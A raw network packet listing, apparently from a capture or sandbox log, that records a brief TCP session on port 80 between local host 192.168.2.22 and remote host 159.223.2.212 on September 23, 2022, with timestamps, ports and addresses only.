Sep 23, 2022 08:13:02.069799900 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.070225954 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082398891 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082458973 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082498074 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082514048 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082537889 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082556009 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082561016 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082581043 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082613945 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082621098 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082634926 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082662106 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082693100 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082701921 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082710981 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082743883 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082763910 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082786083 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082801104 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082825899 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082845926 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082865000 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082870007 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082904100 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082926035 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082942963 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.082950115 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.082983017 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083003998 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083022118 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083029032 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083061934 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083102942 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083102942 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083110094 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083141088 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083168983 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083184958 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083193064 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083225012 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083255053 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083264112 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083268881 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083303928 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083328962 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083343029 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083369970 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083416939 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083435059 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083475113 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083487988 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083515882 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083539963 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083554983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.083575964 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.083627939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086529970 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086549044 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086560965 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086594105 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086625099 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086652994 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086710930 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086724043 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086755037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086762905 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086775064 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086781025 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086786032 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086791039 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086793900 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086800098 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086803913 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086843967 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086846113 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086853027 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086862087 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086884975 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086891890 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086925983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086955070 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.086965084 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.086968899 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087006092 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087027073 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087045908 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087063074 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087085009 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087111950 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087124109 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087129116 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087162971 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087189913 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087205887 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087217093 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087248087 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087269068 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087286949 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087308884 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087326050 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087354898 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087372065 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087438107 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087496042 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087508917 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087534904 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087555885 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087575912 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087579012 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087615967 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087636948 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087656021 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087658882 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087697983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087718010 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087737083 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087743044 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087776899 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087795019 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087816954 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087835073 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087855101 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087874889 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087893963 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.087913036 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087954998 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.087980032 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088025093 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088046074 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088064909 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088080883 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088105917 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088124037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088149071 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088165045 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088191032 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088212013 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088232040 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088248968 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088268995 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088296890 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088308096 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088325024 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088346958 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088371038 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088387012 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088397980 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088428020 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088449001 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088465929 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088473082 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088505030 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088530064 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088545084 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088561058 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088582993 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088607073 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088620901 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088641882 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088711977 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088732004 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088752031 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088756084 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088793039 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088814020 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088830948 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088835955 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088871956 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088892937 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088912010 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088929892 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088949919 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088972092 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.088989973 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.088999987 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.089030027 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.089052916 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.089068890 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.089076042 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.089109898 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.089128971 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.089148998 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.089173079 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.089191914 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.089196920 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.089253902 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096143007 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096190929 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096219063 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096246004 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096246004 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096384048 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096385002 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096393108 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096414089 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096441984 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096446991 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096462011 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096471071 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096499920 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096504927 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096514940 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096528053 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096528053 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096556902 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096565008 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096579075 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096586943 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096610069 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096616030 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096643925 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096663952 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096673012 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096679926 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096697092 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096700907 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096729994 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096729994 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096770048 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096772909 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096795082 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096797943 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096826077 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096837044 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096854925 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096860886 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096883059 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096893072 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096911907 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096914053 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096931934 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096940041 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096956015 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.096967936 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.096995115 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097003937 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097023010 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097023010 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097053051 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097062111 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097081900 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097086906 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097110033 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097126961 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097153902 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097174883 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097177029 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097182035 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097191095 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097198009 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097219944 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097234964 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097240925 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097259045 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097271919 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097300053 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097301960 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097311974 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097322941 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097327948 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097328901 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097342968 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097356081 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097368002 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097384930 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097389936 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097412109 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097412109 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097440004 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097445965 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097465038 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097469091 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097496033 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097497940 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097527981 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097554922 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097568989 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097579002 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097587109 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097588062 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097604990 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097629070 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097632885 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097645044 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097661972 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097672939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097690105 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097695112 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097714901 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097718954 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097748041 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097762108 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097774029 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097801924 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097805023 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097820044 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097830057 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097846985 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097858906 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097867966 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097888947 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097902060 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097915888 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097915888 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097944975 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.097945929 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097975016 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.097990990 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098006010 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098006964 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098028898 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098033905 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098054886 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098076105 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098097086 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098118067 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098144054 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098175049 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098187923 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098196983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098211050 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098218918 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098225117 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098233938 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098242044 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098242998 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098248959 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098253965 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098261118 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098265886 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098273039 CEST	49171	80	192.168.2.22	159.223.2.212
